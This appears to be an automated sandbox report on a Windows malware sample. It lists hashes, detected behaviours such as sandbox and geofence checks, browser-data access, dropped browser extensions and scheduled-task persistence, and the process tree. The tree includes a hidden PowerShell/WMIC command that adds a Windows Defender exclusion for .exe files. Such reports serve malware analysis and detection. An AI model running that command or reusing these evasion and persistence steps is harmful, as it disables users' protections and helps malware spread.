Analysis
-
max time kernel
91s -
max time network
93s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
07-04-2024 17:00
Static task
static1
Behavioral task
behavioral1
Sample
d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe
Resource
win10v2004-20240226-en
General
-
Target
d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe
-
Size
6.3MB
-
MD5
0cf48faa3cba7cfc078ff3d838f7d86d
-
SHA1
edd38d6e966e365b290ff2ce88a432e17d1bb4eb
-
SHA256
d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833
-
SHA512
53e00faae2d1ee0d163f78f56270fd4c21243b0a64611ea4ef220af6066510f9d75b6556b968ddbad67c220bc1eeb201c1b80e18215a054c376c48b068ce153e
-
SSDEEP
196608:91Oc73gCvR7IDbay+twm5R45TN+Bg8OPcDAjVUOE:3Occ4ly+tdUM+8FEjDE
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid Process 75 4948 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Install.exezxEzzCo.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation zxEzzCo.exe -
Executes dropped EXE 3 IoCs
Processes:
Install.exevAelVis.exezxEzzCo.exepid Process 3208 Install.exe 4456 vAelVis.exe 4628 zxEzzCo.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid Process 4948 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
Processes:
zxEzzCo.exedescription ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json zxEzzCo.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json zxEzzCo.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
zxEzzCo.exedescription ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini zxEzzCo.exe -
Drops file in System32 directory 29 IoCs
Processes:
powershell.exezxEzzCo.exevAelVis.exepowershell.exepowershell.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 zxEzzCo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA zxEzzCo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 zxEzzCo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 zxEzzCo.exe File created C:\Windows\system32\GroupPolicy\gpt.ini vAelVis.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 zxEzzCo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 zxEzzCo.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol vAelVis.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft zxEzzCo.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData zxEzzCo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 zxEzzCo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA zxEzzCo.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol zxEzzCo.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE zxEzzCo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 zxEzzCo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache zxEzzCo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content zxEzzCo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA zxEzzCo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 zxEzzCo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 zxEzzCo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 zxEzzCo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies zxEzzCo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 zxEzzCo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 zxEzzCo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA zxEzzCo.exe -
Drops file in Program Files directory 14 IoCs
Processes:
zxEzzCo.exedescription ioc Process File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak zxEzzCo.exe File created C:\Program Files (x86)\orRvbnhdU\BoIyvtW.xml zxEzzCo.exe File created C:\Program Files (x86)\YrliKKkuhgWU2\vqoJCaF.xml zxEzzCo.exe File created C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\aoJBGiA.dll zxEzzCo.exe File created C:\Program Files (x86)\ycfBUKIjHxeOC\CUnMhGJ.dll zxEzzCo.exe File created C:\Program Files (x86)\orRvbnhdU\cJnNzB.dll zxEzzCo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi zxEzzCo.exe File created C:\Program Files (x86)\YrliKKkuhgWU2\qcPJmnQNozuBD.dll zxEzzCo.exe File created C:\Program Files (x86)\ycfBUKIjHxeOC\DSqYrZi.xml zxEzzCo.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi zxEzzCo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak zxEzzCo.exe File created C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\dbotFoU.xml zxEzzCo.exe File created C:\Program Files (x86)\IgAQuzzvNCUn\LfHJfAd.dll zxEzzCo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja zxEzzCo.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc Process File created C:\Windows\Tasks\bEcIFlOHxifjjBuFoU.job schtasks.exe File created C:\Windows\Tasks\aUYdFpynDtMaquqaO.job schtasks.exe File created C:\Windows\Tasks\yozVwwMRZiDXbVH.job schtasks.exe File created C:\Windows\Tasks\YGcJOiVocZfwUgdee.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 3952 schtasks.exe 1440 schtasks.exe 3776 schtasks.exe 1380 schtasks.exe 1948 schtasks.exe 2796 schtasks.exe 4496 schtasks.exe 768 schtasks.exe 4244 schtasks.exe 4836 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exezxEzzCo.exevAelVis.exerundll32.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" zxEzzCo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix zxEzzCo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing zxEzzCo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer vAelVis.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{fb412698-0000-0000-0000-d01200000000}\NukeOnDelete = "0" zxEzzCo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEzxEzzCo.exepowershell.exepid Process 544 powershell.exe 544 powershell.exe 3052 powershell.exe 3052 powershell.exe 4928 powershell.exe 4928 powershell.exe 696 powershell.EXE 696 powershell.EXE 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 2536 powershell.exe 2536 powershell.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe 4628 zxEzzCo.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeWMIC.exepowershell.exepowershell.exepowershell.EXEpowershell.exeWMIC.exedescription pid Process Token: SeDebugPrivilege 544 powershell.exe Token: SeIncreaseQuotaPrivilege 2468 WMIC.exe Token: SeSecurityPrivilege 2468 WMIC.exe Token: SeTakeOwnershipPrivilege 2468 WMIC.exe Token: SeLoadDriverPrivilege 2468 WMIC.exe Token: SeSystemProfilePrivilege 2468 WMIC.exe Token: SeSystemtimePrivilege 2468 WMIC.exe Token: SeProfSingleProcessPrivilege 2468 WMIC.exe Token: SeIncBasePriorityPrivilege 2468 WMIC.exe Token: SeCreatePagefilePrivilege 2468 WMIC.exe Token: SeBackupPrivilege 2468 WMIC.exe Token: SeRestorePrivilege 2468 WMIC.exe Token: SeShutdownPrivilege 2468 WMIC.exe Token: SeDebugPrivilege 2468 WMIC.exe Token: SeSystemEnvironmentPrivilege 2468 WMIC.exe Token: SeRemoteShutdownPrivilege 2468 WMIC.exe Token: SeUndockPrivilege 2468 WMIC.exe Token: SeManageVolumePrivilege 2468 WMIC.exe Token: 33 2468 WMIC.exe Token: 34 2468 WMIC.exe Token: 35 2468 WMIC.exe Token: 36 2468 WMIC.exe Token: SeIncreaseQuotaPrivilege 2468 WMIC.exe Token: SeSecurityPrivilege 2468 WMIC.exe Token: SeTakeOwnershipPrivilege 2468 WMIC.exe Token: SeLoadDriverPrivilege 2468 WMIC.exe Token: SeSystemProfilePrivilege 2468 WMIC.exe Token: SeSystemtimePrivilege 2468 WMIC.exe Token: SeProfSingleProcessPrivilege 2468 WMIC.exe Token: SeIncBasePriorityPrivilege 2468 WMIC.exe Token: SeCreatePagefilePrivilege 2468 WMIC.exe Token: SeBackupPrivilege 2468 WMIC.exe Token: SeRestorePrivilege 2468 WMIC.exe Token: SeShutdownPrivilege 2468 WMIC.exe Token: SeDebugPrivilege 2468 WMIC.exe Token: SeSystemEnvironmentPrivilege 2468 WMIC.exe Token: SeRemoteShutdownPrivilege 2468 WMIC.exe Token: SeUndockPrivilege 2468 WMIC.exe Token: SeManageVolumePrivilege 2468 WMIC.exe Token: 33 2468 WMIC.exe Token: 34 2468 WMIC.exe Token: 35 2468 WMIC.exe Token: 36 2468 WMIC.exe Token: SeDebugPrivilege 3052 powershell.exe Token: SeDebugPrivilege 4928 powershell.exe Token: SeDebugPrivilege 696 powershell.EXE Token: SeDebugPrivilege 2536 powershell.exe Token: SeAssignPrimaryTokenPrivilege 4912 WMIC.exe Token: SeIncreaseQuotaPrivilege 4912 WMIC.exe Token: SeSecurityPrivilege 4912 WMIC.exe Token: SeTakeOwnershipPrivilege 4912 WMIC.exe Token: SeLoadDriverPrivilege 4912 WMIC.exe Token: SeSystemtimePrivilege 4912 WMIC.exe Token: SeBackupPrivilege 4912 WMIC.exe Token: SeRestorePrivilege 4912 WMIC.exe Token: SeShutdownPrivilege 4912 WMIC.exe Token: SeSystemEnvironmentPrivilege 4912 WMIC.exe Token: SeUndockPrivilege 4912 WMIC.exe Token: SeManageVolumePrivilege 4912 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 4912 WMIC.exe Token: SeIncreaseQuotaPrivilege 4912 WMIC.exe Token: SeSecurityPrivilege 4912 WMIC.exe Token: SeTakeOwnershipPrivilege 4912 WMIC.exe Token: SeLoadDriverPrivilege 4912 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exeInstall.exeforfiles.execmd.exepowershell.exevAelVis.exepowershell.execmd.exedescription pid Process procid_target PID 1116 wrote to memory of 3208 1116 d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe 89 PID 1116 wrote to memory of 3208 1116 d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe 89 PID 1116 wrote to memory of 3208 1116 d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe 89 PID 3208 wrote to memory of 4624 3208 Install.exe 91 PID 3208 wrote to memory of 4624 3208 Install.exe 91 PID 3208 wrote to memory of 4624 3208 Install.exe 91 PID 4624 wrote to memory of 2136 4624 forfiles.exe 93 PID 4624 wrote to memory of 2136 4624 forfiles.exe 93 PID 4624 wrote to memory of 2136 4624 forfiles.exe 93 PID 2136 wrote to memory of 544 2136 cmd.exe 94 PID 2136 wrote to memory of 544 2136 cmd.exe 94 PID 2136 wrote to memory of 544 2136 cmd.exe 94 PID 544 wrote to memory of 2468 544 powershell.exe 95 PID 544 wrote to memory of 2468 544 powershell.exe 95 PID 544 wrote to memory of 2468 544 powershell.exe 95 PID 3208 wrote to memory of 3952 3208 Install.exe 97 PID 3208 wrote to memory of 3952 3208 Install.exe 97 PID 3208 wrote to memory of 3952 3208 Install.exe 97 PID 4456 wrote to memory of 3052 4456 vAelVis.exe 107 PID 4456 wrote to memory of 3052 4456 vAelVis.exe 107 PID 4456 wrote to memory of 3052 4456 vAelVis.exe 107 PID 3052 wrote to memory of 2512 3052 powershell.exe 109 PID 3052 wrote to memory of 2512 3052 powershell.exe 109 PID 3052 wrote to memory of 2512 3052 powershell.exe 109 PID 2512 wrote to memory of 4696 2512 cmd.exe 110 PID 2512 wrote to memory of 4696 2512 cmd.exe 110 PID 2512 wrote to memory of 4696 2512 cmd.exe 110 PID 3052 wrote to memory of 3712 3052 powershell.exe 111 PID 3052 wrote to memory of 3712 3052 powershell.exe 111 PID 3052 wrote to memory of 3712 3052 powershell.exe 111 PID 3052 wrote to memory of 4768 3052 powershell.exe 112 PID 3052 wrote to memory of 4768 3052 powershell.exe 112 PID 3052 wrote to memory of 4768 3052 powershell.exe 112 PID 3052 wrote to memory of 3204 3052 powershell.exe 113 PID 3052 wrote to memory of 3204 3052 powershell.exe 113 PID 3052 wrote to memory of 3204 3052 powershell.exe 113 PID 3052 wrote to memory of 2168 3052 powershell.exe 114 PID 3052 wrote to memory of 2168 3052 powershell.exe 114 PID 3052 wrote to memory of 2168 3052 powershell.exe 114 PID 3052 wrote to memory of 1612 3052 powershell.exe 115 PID 3052 wrote to memory of 1612 3052 powershell.exe 115 PID 3052 wrote to memory of 1612 3052 powershell.exe 115 PID 3052 wrote to memory of 3528 3052 powershell.exe 116 PID 3052 wrote to memory of 3528 3052 powershell.exe 116 PID 3052 wrote to memory of 3528 3052 powershell.exe 116 PID 3052 wrote to memory of 2024 3052 powershell.exe 117 PID 3052 wrote to memory of 2024 3052 powershell.exe 117 PID 3052 wrote to memory of 2024 3052 powershell.exe 117 PID 3052 wrote to memory of 4168 3052 powershell.exe 118 PID 3052 wrote to memory of 4168 3052 powershell.exe 118 PID 3052 wrote to memory of 4168 3052 powershell.exe 118 PID 3052 wrote to memory of 2476 3052 powershell.exe 119 PID 3052 wrote to memory of 2476 3052 powershell.exe 119 PID 3052 wrote to memory of 2476 3052 powershell.exe 119 PID 3052 wrote to memory of 1212 3052 powershell.exe 120 PID 3052 wrote to memory of 1212 3052 powershell.exe 120 PID 3052 wrote to memory of 1212 3052 powershell.exe 120 PID 3052 wrote to memory of 4452 3052 powershell.exe 121 PID 3052 wrote to memory of 4452 3052 powershell.exe 121 PID 3052 wrote to memory of 4452 3052 powershell.exe 121 PID 3052 wrote to memory of 1372 3052 powershell.exe 122 PID 3052 wrote to memory of 1372 3052 powershell.exe 122 PID 3052 wrote to memory of 1372 3052 powershell.exe 122 PID 3052 wrote to memory of 2144 3052 powershell.exe 123
Processes
-
C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe"C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe.\Install.exe /PdidDDD "385118" /S2⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3208 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
-
-
-
